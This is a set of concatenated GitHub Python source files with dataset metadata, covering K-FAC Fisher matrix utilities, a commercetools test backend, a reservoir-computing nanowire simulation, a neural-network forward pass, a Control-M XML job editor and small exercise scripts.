os.path.isfile(args.load_model):\n load_path = args.load_model\n elif os.path.isdir(args.load_model):\n load_path = os.path.join(args.load_model, 'final_model.pt')\n if args.gpu_id != -1:\n state = torch.load(\n load_path,\n map_location=(\n lambda s, _: torch.serialization.default_restore_location(s, 'cuda:' + str(args.gpu_id))\n ),\n )\n else:\n state = torch.load(\n load_path,\n map_location=(\n lambda s, _: torch.serialization.default_restore_location(s, 'cpu')\n ),\n )\n\n print(\"Loading model at path {} which had test accuracy {} at epoch {}\".format(load_path, state['test_accuracies'][-1],\n state['epoch']))\n model.load_state_dict(state['model_state_dict'])\n optimizer.load_state_dict(state['optimizer_state_dict'])\n\n if args.gpu_id != -1:\n model = model.cuda(args.gpu_id)\n\ndef get_sample_args():\n args = {'enable_dropout': False,\n 'MNIST_PATH': '../hessian/files/',\n 'to_download': True,\n 'batch_size_train': 64,\n 'batch_size_test': 1000,\n 'train_bsz': 64,\n 'test_bsz': 1000,\n 'subsample_size': 5000,\n 'momentum': 0.5,\n 'lr': 0.001,\n 'gpu_id': 0,\n 'log_interval': 20,\n 'dump_model': False,\n 'epochs': 10,\n 'load_model': './kfac_dump/2020-03-24_18-56-29_616127',\n 'num_hidden_nodes1': 40,\n 'num_hidden_nodes2': 20,\n 'num_classes':10,\n 'input_size': 784,\n }\n\n return dotdict(args)\n\n## Kronecker utils\ndef kronecker(A, B):\n print(f\"shape of A and B is {A.shape} and {B.shape} resp.\")\n return torch.einsum(\"ab,cd->acbd\", A, B).view(A.size(0)*B.size(0), A.size(1)*B.size(1))\n\ndef kronecker_shape(shape_a, shape_b, idx=-1):\n if idx == -1:\n assert shape_a[0]*shape_b[0] == shape_a[1]*shape_b[1]\n return shape_a[0]*shape_b[0]\n else:\n return shape_a[idx]*shape_b[idx]\n\n\ndef batch_kronecker(A, B, reduce=None, minibsz=-1):\n # Reduce refers to taking the mean of the batch of kronecker products computed\n # Also, support mini-batching in reduction mode to save memory!\n assert A.size(0) == B.size(0)\n bsz = A.size(0)\n if reduce is None:\n return torch.einsum('bpq, brs->bprqs', A, B).view(bsz, A.size(1) * B.size(1), A.size(2) * B.size(2))\n else:\n if minibsz == -1:\n if reduce == 'mean':\n return torch.einsum('bpq, brs->bprqs', A, B).mean(dim=0).view(A.size(1) * B.size(1),\n A.size(2) * B.size(2))\n elif reduce == 'sum':\n return torch.einsum('bpq, brs->bprqs', A, B).sum(dim=0).view(A.size(1) * B.size(1),\n A.size(2) * B.size(2))\n else:\n assert bsz % minibsz == 0\n ans = A.new(A.size(1) * B.size(1), A.size(2) * B.size(2)).fill_(0)\n num_iters = int(bsz / minibsz)\n for idx in range(num_iters):\n ans += torch.einsum('bpq, brs->bprqs',\n A[idx * bsz:(idx + 1) * bsz], B[idx * bsz:(idx + 1) * bsz]\n ).sum(dim=0).view(A.size(1) * B.size(1), A.size(2) * B.size(2))\n if reduce == 'mean':\n ans /= bsz\n return ans\n\ndef batch_outer_product(A, B):\n assert A.size(0) == B.size(0)\n # actually this is more of batch of outer products that I have implemented here in!\n return torch.einsum('bp, bq->bpq', A, B).view(A.size(0), A.size(1)*B.size(1))\n\n## Input and Output hooks\ndef _save_input(m_aa, ActHandler):\n def hook(module, input):\n\n aa = ActHandler(input[0].data, module)\n # Initialize buffers\n if steps == 0:\n # basically initializes a matrix of the size of aa,\n # why not simply, xx.new(xx.size()).fill_(0)?\n m_aa[module] = torch.diag(aa.new(aa.size(0)).fill_(0))\n m_aa[module] += aa\n\n return hook\n\ndef _save_input_offdiagonal(s_aa, ActHandler):\n def hook(module, input):\n a = ActHandler(input[0].data, module)\n print('shape of a is ', a.shape)\n # Initialize buffers\n if steps == 0:\n s_aa[module] = a\n else:\n s_aa[module] = torch.cat([s_aa[module], a], 0)\n return hook\n\ndef _save_grad_output(m_gg, GradHandler, batch_averaged=True):\n def hook(module, grad_input, grad_output):\n # Accumulate statistics for Fisher matrices\n gg = GradHandler(grad_output[0].data, module, batch_averaged)\n # Initialize buffers\n if steps == 0:\n m_gg[module] = torch.diag(gg.new(gg.size(0)).fill_(0))\n m_gg[module] += gg\n\n return hook\n\ndef _save_grad_output_offdiagonal(s_gg, GradHandler, batch_averaged=True):\n def hook(module, grad_input, grad_output):\n # Accumulate statistics for Fisher matrices\n g = GradHandler(grad_output[0].data, module, batch_averaged)\n # Initialize buffers\n if steps == 0:\n s_gg[module] = g\n else:\n s_gg[module] = torch.cat([s_gg[module], g], 0)\n return hook\n\n\ndef _prepare_model(model, m_aa, m_gg, s_aa=None, s_gg=None,\n offdiagonal=False, proper=True, fix_layers=0):\n count = 0\n print(model)\n modules = []\n module_names = []\n print(\"=> We keep following layers in model. \")\n known_modules = {'Linear', 'Conv2d'}\n\n if proper:\n CovAHandler = ComputeCovA_proper()\n CovGHandler = ComputeCovG_proper()\n StoreAHandler = StoreA_proper()\n StoreGHandler = StoreG_proper()\n else:\n CovAHandler = ComputeCovA()\n CovGHandler = ComputeCovG()\n StoreAHandler = StoreA()\n StoreGHandler = StoreG()\n\n inp_hooks = [_save_input(m_aa, CovAHandler)]\n out_hooks = [_save_grad_output(m_gg, CovGHandler)]\n\n if offdiagonal:\n assert s_aa is not None\n assert s_gg is not None\n inp_hooks.append(_save_input_offdiagonal(s_aa, StoreAHandler))\n out_hooks.append(_save_grad_output_offdiagonal(s_gg, StoreGHandler))\n\n for module_name, module in model.named_modules():\n print(module)\n classname = module.__class__.__name__\n if classname in known_modules:\n modules.append(module)\n module_names.append(module_name)\n for inp_hook in inp_hooks:\n module.register_forward_pre_hook(inp_hook)\n for out_hook in out_hooks:\n module.register_backward_hook(out_hook)\n print('(%s): %s' % (count, module))\n count += 1\n modules = modules[fix_layers:]\n module_names = module_names[fix_layers:]\n return modules, module_names\n\ndef get_module_keys(model, prune_modules=None):\n modules = []\n known_modules = {'WrappedLayer'}\n for module_name, module in model.named_modules():\n classname = module.__class__.__name__\n if classname in known_modules:\n if hasattr(module, 'custom_name'):\n modules.append(module)\n\n return modules\n\ndef get_module_custom_names(model, prune_modules=None):\n custom_names = []\n known_modules = {'WrappedLayer'}\n for module_name, module in model.named_modules():\n classname = module.__class__.__name__\n if classname in known_modules:\n if hasattr(module, 'custom_name'):\n custom_names.append(module.custom_name)\n return custom_names\n\ndef _get_block_kro_dic(modules, s_dic):\n kro_dic = {}\n for i, mod_i in enumerate(modules):\n kro_dic[mod_i] = s_dic[mod_i].t() @ s_dic[mod_i]\n return kro_dic\n\ndef _get_kro_dic(modules, s_dic):\n kro_dic = {}\n for i, mod_i in enumerate(modules):\n for j, mod_j in enumerate(modules):\n kro_dic[f\"{mod_i.custom_name}_{mod_j.custom_name}\"] = s_dic[mod_i.custom_name].t() @ s_dic[mod_j.custom_name]\n return kro_dic\n\ndef _to_kro_dic(modules, m_dic):\n kro_dic = {}\n for i, mod_i in enumerate(modules):\n kro_dic[f\"{mod_i.custom_name}_{mod_i.custom_name}\"] = m_dic[mod_i.custom_name]\n return kro_dic\n\ndef convert_to_kro_dic(model, m_dic, prune_modules=None):\n custom_names = get_module_custom_names(model, prune_modules=prune_modules)\n print(custom_names, prune_modules)\n kro_dic = {}\n for i, custom_name in enumerate(custom_names):\n print(f\"key is {custom_name}_{custom_name}\")\n kro_dic[f\"{custom_name}_{custom_name}\"] = m_dic[custom_name]\n return kro_dic\n\n\ndef compare_norms(mat1, mat2):\n diff_norm = (mat1 - mat2).norm()\n print(f\"Difference norm: {diff_norm.item()}, mat1 norm: {mat1.norm().item()}, mat2 norm: {mat1.norm().item()}.\")\n print(f\"Ratio of the norm difference to largest norm: {diff_norm.item()/max(mat1.norm(), mat2.norm()).item()}.\")\n\ndef compare_blockwise_curvature_matrices(model, mat1, mat2):\n offset = 0\n total_norm = 0\n for param in model.parameters():\n num_param = param.numel()\n layer_norm = (mat1[offset:offset + num_param, offset:offset + num_param] -\n mat2[offset:offset + num_param, offset:offset + num_param]).norm()\n print(f\"norm for layer with params from {offset} to {offset + num_param} is \", layer_norm)\n total_norm += layer_norm ** 2\n offset += num_param\n total_norm = total_norm ** (1 / 2)\n print(\"Total norm difference across the layer blocks is \", total_norm.item())\n return total_norm\n\ndef are_blockwise_close(model, mat1, mat2, atol=1e-5):\n offset = 0\n for param in model.parameters():\n num_param = param.numel()\n print(f\"checking for layer with params from {offset} to {offset + num_param}: \")\n print(torch.allclose(mat1[offset:offset + num_param, offset:offset + num_param],\n mat2[offset:offset + num_param, offset:offset + num_param], atol=atol))\n offset += num_param\n\n\ndef inv_covs(xxt, ggt, eps, use_pi=True):\n # Modified from https://github.com/Thrandis/EKFAC-pytorch/blob/master/kfac.py\n\n \"\"\"Inverses the covariances.\"\"\"\n # num_locations is 1 for conv,\n # but for conv it is more like the product of spatial dimensions\n\n pi = 1.0\n if use_pi:\n # Computes pi\n tx = torch.trace(xxt) * ggt.shape[0]\n tg = torch.trace(ggt) * xxt.shape[0]\n pi = (tx / tg)\n\n # Regularizes and inverse\n\n diag_xxt = xxt.new(xxt.shape[0]).fill_((eps * pi) ** 0.5)\n diag_ggt = ggt.new(ggt.shape[0]).fill_((eps / pi) ** 0.5)\n print(diag_xxt.mean(), diag_ggt.mean())\n ixxt = (xxt + torch.diag(diag_xxt)).inverse()\n iggt = (ggt + torch.diag(diag_ggt)).inverse()\n return ixxt, iggt\n\n\ndef get_blockwise_kfac_inverse(model, m_aa=None, m_gg=None, s_aa=None, s_gg=None, num_samples=5000, damp=1e-5, use_pi=True, offload_cpu=False):\n num_params = sum([module.numel() for module in model.parameters()])\n device = list(model.parameters())[0].device\n\n if offload_cpu:\n emp_kfac_blockwise_fisher_inv = torch.zeros(num_params, num_params).cpu()\n else:\n emp_kfac_blockwise_fisher_inv = torch.zeros(num_params, num_params).to(device)\n\n block_offset = 0\n modules = get_module_keys(model)\n print(modules)\n if m_aa is None and m_gg is None and s_aa is not None and s_gg is not None:\n print(\"compute m_aa and m_gg again\")\n m_aa, m_gg = _get_kro_dic(modules, s_aa), _get_kro_dic(modules, s_gg)\n\n for idx, mod in enumerate(modules):\n block_params = block_offset + kronecker_shape(m_aa[f\"{mod.custom_name}_{mod.custom_name}\"].shape, m_gg[f\"{mod.custom_name}_{mod.custom_name}\"].shape)\n print(f\"updating diagonal fisher inverse block, {block_offset}:{block_params}\")\n aainv, gginv = inv_covs(m_aa[f\"{mod.custom_name}_{mod.custom_name}\"]/num_samples, m_gg[f\"{mod.custom_name}_{mod.custom_name}\"]/num_samples, eps=damp, use_pi=use_pi)\n if offload_cpu:\n emp_kfac_blockwise_fisher_inv[block_offset:block_params, block_offset:block_params] = kronecker(\n gginv.cpu(), aainv.cpu())\n else:\n emp_kfac_blockwise_fisher_inv[block_offset:block_params, block_offset:block_params] = kronecker(\n gginv, aainv)\n\n block_offset += kronecker_shape(gginv.shape, aainv.shape)\n del aainv, gginv\n\n return emp_kfac_blockwise_fisher_inv\n\n","repo_name":"IST-DASLab/WoodFisher","sub_path":"utils/kfac_fisher_utils.py","file_name":"kfac_fisher_utils.py","file_ext":"py","file_size_in_byte":15409,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"76"} +{"seq_id":"33289507848","text":"import datetime\nimport uuid\nfrom typing import Optional\n\nfrom commercetools.platform import models\nfrom commercetools.platform.models._schemas.customer import (\n CustomerDraftSchema,\n CustomerPagedQueryResponseSchema,\n CustomerSchema,\n CustomerUpdateSchema,\n)\nfrom commercetools.testing import abstract, utils\nfrom commercetools.testing.utils import create_commercetools_response\n\n\nclass CustomerModel(abstract.BaseModel):\n _resource_schema = CustomerSchema\n _primary_type_name = \"customer\"\n _unique_values = [\"key\"]\n\n def _create_from_draft(\n self, draft: models.CustomerDraft, id: Optional[str] = None\n ) -> models.Customer:\n object_id = uuid.UUID(id) if id is not None else uuid.uuid4()\n now = datetime.datetime.now(datetime.timezone.utc)\n\n return models.Customer(\n id=str(object_id),\n version=1,\n created_at=now,\n last_modified_at=now,\n authentication_mode=models.AuthenticationMode.PASSWORD,\n customer_number=draft.customer_number,\n email=draft.email,\n password=draft.password,\n first_name=draft.first_name,\n last_name=draft.last_name,\n middle_name=draft.middle_name,\n title=draft.title,\n date_of_birth=draft.date_of_birth,\n company_name=draft.company_name,\n vat_id=draft.vat_id,\n addresses=draft.addresses,\n default_shipping_address_id=(\n str(draft.default_shipping_address)\n if draft.default_shipping_address\n else None\n ),\n shipping_address_ids=(\n [str(address_id) for address_id in draft.shipping_addresses]\n if draft.shipping_addresses\n else None\n ),\n default_billing_address_id=(\n str(draft.default_billing_address)\n if draft.default_billing_address\n else None\n ),\n billing_address_ids=(\n [str(address_id) for address_id in draft.billing_addresses]\n if draft.billing_addresses\n else None\n ),\n is_email_verified=draft.is_email_verified,\n external_id=draft.external_id,\n customer_group=draft.customer_group,\n custom=utils.create_from_draft(draft.custom),\n locale=draft.locale,\n salutation=draft.salutation,\n key=draft.key,\n )\n\n\nclass CustomerBackend(abstract.ServiceBackend):\n service_path = \"customers\"\n model_class = CustomerModel\n _schema_draft = CustomerDraftSchema\n _schema_update = CustomerUpdateSchema\n _schema_query_response = CustomerPagedQueryResponseSchema\n\n def urls(self):\n return [\n (\"^$\", \"GET\", self.query),\n (\"^$\", \"POST\", self.create),\n (\"^key=(?P[^/]+)$\", \"GET\", self.get_by_key),\n (\"^key=(?P[^/]+)$\", \"POST\", self.update_by_key),\n (\"^key=(?P[^/]+)$\", \"DELETE\", self.delete_by_key),\n (\"^(?P[^/]+)$\", \"GET\", self.get_by_id),\n (\"^(?P[^/]+)$\", \"POST\", self.update_by_id),\n (\"^(?P[^/]+)$\", \"DELETE\", self.delete_by_id),\n ]\n\n def create(self, request):\n obj = self._schema_draft().loads(request.body)\n data = self.model.add(obj)\n\n # Convert to CustomerSignInResult\n data = {\"customer\": data, \"cart\": None}\n\n expanded_data = self._expand(request, data)\n return create_commercetools_response(request, json=expanded_data)\n","repo_name":"labd/commercetools-python-sdk","sub_path":"src/commercetools/testing/customers.py","file_name":"customers.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"76"} +{"seq_id":"72391278326","text":"from math import floor\n\nseries_name = input()\nseasons_count = int(input())\nepisodes_count = int(input())\nepisode_duration = float(input())\n\nads_duration_per_episode = episode_duration * 0.2\nepisode_duration += ads_duration_per_episode\nspeical_episodes_extra_duration = seasons_count * 10\n\ntotal_watch_time = episode_duration * episodes_count * seasons_count + speical_episodes_extra_duration\n\nprint(f'Total time needed to watch the {series_name} series is {floor(total_watch_time)} minutes.')","repo_name":"StivanD/Sofutni-Python","sub_path":"01_python_basics/programming_basics_exams/programming_basics_online_exam_15_and_16_june_2019/01_series_calculator.py","file_name":"01_series_calculator.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34942066383","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport os\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport networkx as nx\r\n#import user-defined functions\r\nfrom functions import define_grid_graph_2,initialize_graph_attributes, mod_voltage_node_analysis, update_edge_weigths\r\nfrom functions_reservoir import dataset_to_pulse, insert_R_to_graph, remove_R_from_graph\r\n#%%\r\ndef plot(H):\r\n remove_R_from_graph(H, src, new_nodes, gnd)\r\n fig3, ax = plt.subplots(figsize=(10, 10))\r\n plt.cla()\r\n pos=nx.get_node_attributes(H,'pos')\r\n \r\n nx.draw_networkx(H, pos,\r\n #NODES\r\n node_size=60,\r\n node_color=[H.nodes[n]['V'] for n in H.nodes()],\r\n cmap=plt.cm.Blues,\r\n vmin=0,\r\n vmax=pulse_amplitude+V_read,\r\n #EDGES\r\n width=4,\r\n edge_color=[H[u][v]['Y'] for u,v in H.edges()],\r\n edge_cmap=plt.cm.Reds,\r\n edge_vmin=g_min,\r\n edge_vmax=g_max,\r\n with_labels=False, #Set TRUE to see node numbers\r\n font_size=6,)\r\n nx.draw_networkx_nodes(H, pos, nodelist=src, node_size=100, node_color='k')\r\n\r\n\r\n#%% OUTPUT DIRECTORIES\r\n \r\nout_dir_3 = './out_data/Fig3/'\r\nout_dir_4 = './out_data/Fig4/'\r\n\r\nif not os.path.exists(r'./out_data/Fig3/'):\r\n os.makedirs(r'./out_data/Fig3/')\r\nif not os.path.exists(r'./out_data/Fig4/'):\r\n os.makedirs(r'./out_data/Fig4/')\r\n\r\n#%% DATASET LOAD & DISPLAY\r\n\r\nfile_to_train = './raw_data/pattern'\r\n\r\nfile_train = file_to_train+'.txt'\r\nfile_train_class = file_to_train+'_class.txt'\r\n\r\ndigit_train = np.loadtxt(file_train)\r\ndigit_train_class = np.loadtxt(file_train_class)\r\n\r\ndigit_rows = 4\r\ndigit_cols = 4\r\n\r\ntotal_rows_train = int(len(digit_train))\r\nnum_digits_train = len(digit_train_class)\r\n\r\ndigit_list_train = [[] for i in range(0, num_digits_train)]\r\nfor i in range(0, num_digits_train):\r\n digit_list_train[i] =digit_train[digit_rows*i:digit_rows*(i+1)][:]\r\n \r\ncolor_n = ['--*b','--*r','--*g']\r\nname = ['North', 'East', 'South']\r\npattern_name = ['diag1', 'diag2', 'horz', 'vert']\r\n \r\n#%% NETWORK PROPERTIES DEFINITION\r\n# north pulse fit\r\nkp0 = 2.555173332603108574e-06\r\nkd0 = 6.488388862524891465e+01\r\neta_p = 3.492155165334443012e+01\r\neta_d = 5.590601016803570467e+00\r\ng_min = 1.014708121672117710e-03\r\ng_max = 2.723493729125820492e-03\r\ng0 = 5.602507668026886038e-04\r\ng0 = g_min\r\n \r\nxdim = 21 # graph dimension\r\nydim = 21\r\nframe = 2 #number of frame rows/columns\r\n\r\nleft_pads = [(xdim-1)*(frame+1)-2-3*i for i in range(0, 5)] # (from top to bottom)\r\nright_pads = [(xdim*xdim-1)-xdim*frame-frame-2-3*i for i in range(0, 5)] # (from top to bottom)\r\ntop_pads = [(xdim-1)+xdim*(frame+2)-frame+xdim*3*i for i in range(0, 5)] # (from left to right)\r\nbottom_pads = [xdim*(frame+2)+frame+xdim*3*i for i in range(0, 5)] # (from left to right)\r\n\r\npad_N = top_pads[2] \r\npad_E = right_pads[2]\r\npad_S = bottom_pads[2] \r\npad_W = left_pads[2]\r\n\r\nsrc = [pad_N, pad_E, pad_S, pad_W]\r\nnew_nodes = [xdim*xdim+nn for nn in range(4)]\r\ngnd = [new_nodes[-1]+1]\r\n\r\n#%% NETWORK INPUTs\r\n\r\n####### CUSTOMIZE YOUR PULSE SHAPE ###############\r\nR_read = [82]*4\r\nV_read = 100e-3\r\npulse_amplitude = 5 # Volts\r\n\r\ndelta_pot = 250e-6 # distance for potentiation points\r\ndelta_dep = 250e-6 # distance for depression points\r\ndelta_read = delta_dep\r\ndelta = 250e-6 # distance for transition from low to high signal and viceversa \r\n\r\npulse_time = 10e-3-delta\r\nidle_time = 5e-4-delta \r\nread_time = 5.5e-3 # seconds between write and read\r\n\r\n####################################################\r\nread_timesteps = int(read_time/delta_read)-1\r\npulse_timesteps = int(pulse_time/delta_pot) \r\nidle_timesteps = int(idle_time/delta_dep)\r\n\r\none_pulse = 2*idle_timesteps+pulse_timesteps+3 # points of a single pulse\r\n\r\n\r\ntime_write_1 = np.linspace(0, idle_time, idle_timesteps+1)\r\ntime_write_2 = np.linspace(idle_time+delta, idle_time+delta+pulse_time, pulse_timesteps+1)\r\ntime_write_3 = np. linspace(idle_time+pulse_time+2*delta, idle_time+pulse_time+2*delta+idle_time, idle_timesteps+1)\r\ntime_write_tot = np.append(np.append(time_write_1, time_write_2), time_write_3)\r\n\r\ntime_write = time_write_tot\r\n\r\nfor i in range(1, digit_cols):\r\n time_write = np.append(time_write, time_write_tot+time_write[-1]+delta_dep)\r\n\r\ntimesteps_write = len(time_write)\r\n\r\nint_point = [[] for ip in range(digit_cols+1)]\r\n\r\nfor ip in range(0, digit_cols+1):\r\n int_point[ip] = one_pulse*ip+idle_timesteps \r\n\r\nint_point[-1] = timesteps_write+read_timesteps\r\n\r\ndataset_readout = [[] for i in range(0, num_digits_train)] # input for readout function\r\ndataset_to_save = [[] for i in range(0, num_digits_train)] # input for readout function\r\n\r\nhist = np.zeros((5,4,3))\r\nH_to_plot = [[[] for j in range(5)] for i in range(4)]\r\nV_list_read = [[np.zeros((4, timesteps_write+read_timesteps+1))] for i in range(4)]\r\n\r\nfor digit in range(0, num_digits_train):\r\n \r\n print('Simulating pattern '+ pattern_name[digit])\r\n\r\n G = define_grid_graph_2(xdim, ydim)\r\n G = initialize_graph_attributes(G, g0) \r\n input_digit = int(digit_train_class[digit])\r\n\r\n\r\n H_list_write = [[] for t in range(0, timesteps_write+read_timesteps+1)]\r\n \r\n train_pulse, _ = dataset_to_pulse(digit_rows, digit_cols, timesteps_write, pulse_timesteps+1, idle_timesteps+1, digit_list_train, digit, pulse_amplitude)\r\n \r\n Vin_list_write = [[] for t in range(0, timesteps_write)]\r\n\r\n for t in range(0, timesteps_write):\r\n for r in range(0, digit_rows):\r\n if train_pulse[r][t] == 0:\r\n Vin_list_write[t] = list(Vin_list_write[t])+[int(r==digit_rows-1)*V_read]\r\n else:\r\n Vin_list_write[t] = list(Vin_list_write[t])+[int(r==digit_rows-1)*V_read+np.multiply(pulse_amplitude,(train_pulse[r][t]))]\r\n\r\n \r\n insert_R_to_graph(G, R_read, src, new_nodes, gnd)\r\n \r\n H_list_write[0] = mod_voltage_node_analysis(G, Vin_list_write[0], new_nodes, gnd)\r\n \r\n for i in range(1, timesteps_write):\r\n \r\n delta_t = time_write[i] - time_write[i-1]\r\n \r\n remove_R_from_graph(G, src, new_nodes, gnd) \r\n G = update_edge_weigths(G, delta_t, g_min, g_max, kp0, eta_p, kd0, eta_d) #update edges\r\n insert_R_to_graph(G, R_read, src, new_nodes, gnd)\r\n \r\n H_list_write[i] = mod_voltage_node_analysis(G, Vin_list_write[i], new_nodes, gnd)\r\n for c in range(4):\r\n V_list_read[digit][0][c, i] = H_list_write[i].nodes[src[c]]['V']\r\n \r\n for i in range(timesteps_write, timesteps_write+read_timesteps+1):\r\n \r\n delta_t = delta_read\r\n \r\n remove_R_from_graph(G, src, new_nodes, gnd) \r\n G = update_edge_weigths(G, delta_t, g_min, g_max, kp0, eta_p, kd0, eta_d) #update edges\r\n insert_R_to_graph(G, R_read, src, new_nodes, gnd)\r\n \r\n H_list_write[i] = mod_voltage_node_analysis(G, Vin_list_write[-1], new_nodes, gnd)\r\n for c in range(4):\r\n V_list_read[digit][0][c, i] = H_list_write[i].nodes[src[c]]['V']\r\n \r\n time_int = int_point\r\n\r\n for t_int in range(5):\r\n H_to_plot[digit][t_int] = H_list_write[time_int[t_int]]\r\n for n in range(3):\r\n hist[t_int,digit,n] = H_list_write[time_int[t_int]].nodes[src[n]]['V']\r\n \r\n print('Pattern '+pattern_name[digit]+' completed\\n')\r\n \r\n#%% FIG 3\r\n\r\nplt.figure(figsize=(18,9))\r\n\r\nfor n in range(3):\r\n plt.plot(range(5), hist[:,0,n], color_n[n], label=name[n], linewidth=1.5)\r\nplt.title(pattern_name[0], fontsize=20)\r\nplt.grid()\r\nplt.xticks(range(5), ['t0', 't1', 't2', 't3', 't4'], fontsize=15)\r\nplt.yticks(fontsize=15)\r\nplt.ylabel('Voltage [V]', fontsize=15)\r\nplt.legend(fontsize=15)\r\nplt.ylim([ np.min(hist[:,:,:])-0.001, np.max(hist[:,:,:])]) \r\nplt.savefig(out_dir_3+'diag1_Vout_vs_time_model.png')\r\n\r\nfor t_int in range(5):\r\n plot(H_to_plot[0][t_int])\r\n name = 'pattern_'+pattern_name[0]+'_t_int_'+str(t_int)+'.png'\r\n plt.savefig(out_dir_3+name) \r\n \r\nfsave = hist[:,0,0]\r\nfname = 'pattern_'+pattern_name[0]+'_Vout_vs_time_model.txt'\r\nfor n in range(1, 3):\r\n fsave = np.vstack((fsave, hist[:,0,n]))\r\nnp.savetxt(out_dir_3+fname, fsave.T, header='n1 - n2 - n3') \r\n\r\n#%% FIG 4\r\n\r\nplt.figure(figsize=(18,9)) \r\nfor i in range(4):\r\n plt.subplot(1,4,i+1)\r\n plt.bar([1, 2, 3], hist[-1,i,:], color='dodgerblue', alpha=0.5)\r\n plt.ylim([0, np.max(hist[[0,-1],:,:])])\r\n plt.xticks([1,2,3], fontsize = 15)\r\n plt.yticks(fontsize = 15)\r\n plt.xlabel('Neuron', fontsize = 15)\r\n plt.ylabel('Voltage [V]', fontsize = 15)\r\n plt.title('Pattern: '+pattern_name[i], fontsize = 20)\r\nplt.tight_layout()\r\nplt.savefig(out_dir_4+'hist_model.png')\r\n\r\nfor p in range(4):\r\n plot(H_to_plot[p][-1])\r\n name = 'pattern_'+pattern_name[p]+'_t_int_'+str(t_int)+'.png'\r\n plt.savefig(out_dir_4 + name)\r\n \r\nfile_to_save = hist[-1,:,:]\r\nnp.savetxt(out_dir_4+'hist_model.txt', file_to_save.T, header='t1-t2-t3-t4', delimiter=' ')\r\n ","repo_name":"MilanoGianluca/Nanowire_Network_Reservoir_Computing","sub_path":"Fig_3_4/RC_pattern.py","file_name":"RC_pattern.py","file_ext":"py","file_size_in_byte":9190,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"12070494572","text":"import numpy as np\nimport time\n\"\"\"\nThe functions of the first part: Forward propagation process\n\"\"\"\n\n\n# a.\ndef initialize_parameters(layer_dims):\n dic = {}\n np.random.seed(int(time.time()))\n for i in range(1, len(layer_dims)):\n dic['W' + str(i)] = np.random.random((layer_dims[i], layer_dims[i - 1]))/100\n dic['b' + str(i)] = np.zeros((layer_dims[i], 1))\n return dic\n\n\n# b.\ndef linear_forward(A, W, b):\n Z = W.dot(A) + b\n cache = (A, W, b)\n return Z, cache\n\n\n# c.\ndef sigmoid(Z):\n return 1 / (1 + np.exp(-Z)),Z\n\n\n# d.\ndef relu(Z):\n zeros = np.zeros((Z.shape[0], Z.shape[1]))\n rel = np.maximum(zeros, Z)\n return rel, Z\n\n\n# e.\ndef linear_activation_forward(A_prev, W, B, activation):\n Z, linear_cache = linear_forward(A_prev, W, B)\n if activation == \"sigmoid\":\n A, activation_cache = sigmoid(Z)\n elif activation == \"relu\":\n A, activation_cache = relu(Z)\n return A, (linear_cache, activation_cache)\n\n\n# f.\ndef L_model_forward(X, parameters, use_batchnorm=False, dropout=0.5):\n caches = []\n N_layers = len(parameters) // 2\n A = X\n for l in range(1, N_layers):\n A_last = A\n A, cache = linear_activation_forward(A_last, parameters['W' + str(l)], parameters['b' + str(l)], 'relu')\n A = DropOut(A, dropout)\n if (use_batchnorm):\n A = apply_batchnorm(A)\n caches.append(cache)\n AL, cache = linear_activation_forward(A, parameters['W' + str(N_layers)], parameters['b' + str(N_layers)], 'sigmoid')\n caches.append(cache)\n return AL, caches\n\n\n# g.\ndef compute_cost(AL, Y):\n cost = (-1 / Y.shape[1]) * np.sum(np.multiply(np.log(AL),Y) + np.multiply( np.log(1 - AL),1-Y))\n if cost.shape != ():\n cost = np.squeeze(cost)\n return cost\n\n\n# h.\ndef apply_batchnorm(A):\n return (A-np.mean(A, axis=0)) / (np.var(A, axis=0)+1e-8)\n\ndef DropOut(L,rate):\n drop = np.random.rand(L.shape[0],L.shape[1])\n for i in range(L.shape[0]):\n for j in range(L.shape[1]):\n if drop[i][j] <= rate:\n drop[i][j] = 0\n else:\n drop[i][j] = 1\n res = drop*L\n return res\n","repo_name":"YR23/Deep-Learning-Assignment-1","sub_path":"forward_propagation.py","file_name":"forward_propagation.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2796364633","text":"import xml.etree.ElementTree as ET\r\nimport re\r\nimport commands as cm\r\n\r\ndef putCommand(src,dest):\r\n xmlfile =\"new.xml\"\r\n tree = ET.parse(xmlfile)\r\n root = tree.getroot()\r\n for item in root.findall('./FOLDER/JOB'):\r\n jobName = item.attrib['JOBNAME']\r\n action = re.findall(r'(FW|GBT|MSEQ|CD|EBT)$', jobName)#change\r\n regex = r\"(?<=(^BIHAU_T2_BH\"+src+\"_\"+dest+\"_))(.*?)(?=(_(FW|GBT|MSEQ|CD|EBT))$)\"\r\n fileExt = re.findall(regex, jobName)#change\r\n if len(action)!=0 and len(fileExt)!=0:\r\n action = action[0]\r\n fileExt = fileExt[0][1]\r\n\r\n #change if-else block\r\n if action == 'FW':\r\n sameActionCommand = cm.FW\r\n elif action == 'GBT':\r\n sameActionCommand = cm.GBT\r\n elif action == 'MSEQ':\r\n sameActionCommand = cm.MSEQ\r\n elif action == 'CD':\r\n sameActionCommand = cm.CD\r\n elif action == 'EBT':\r\n sameActionCommand = cm.EBT\r\n else:\r\n sameActionCommand = ['']\r\n\r\n\r\n commandline = 'hostname'\r\n for i in cm.FW:\r\n #check the index of the FW command for the current job file and use the same index for this job\r\n if fileExt in i.upper():\r\n cmdIndex = cm.FW.index(i)\r\n print(fileExt,\" \",cmdIndex)\r\n commandline = sameActionCommand[cmdIndex]\r\n \r\n item.set('CMDLINE', commandline)\r\n\r\n tree.write(src+\"_\"+dest+\".xml\")\r\n\r\nif __name__ == \"__main__\":\r\n putCommand(\"GADEN\",\"TALLYMAN\")\r\n","repo_name":"anirbanmaji/Control-M-xml-modification","sub_path":"Tallyman/addCommand.py","file_name":"addCommand.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"7675257914","text":"\"\"\"\n遍历找出所有路径,然后逐条判断\n\"\"\"\nclass BITNode:\n def __init__(self):\n self.data = None\n self.lchild = None\n self.rchild = 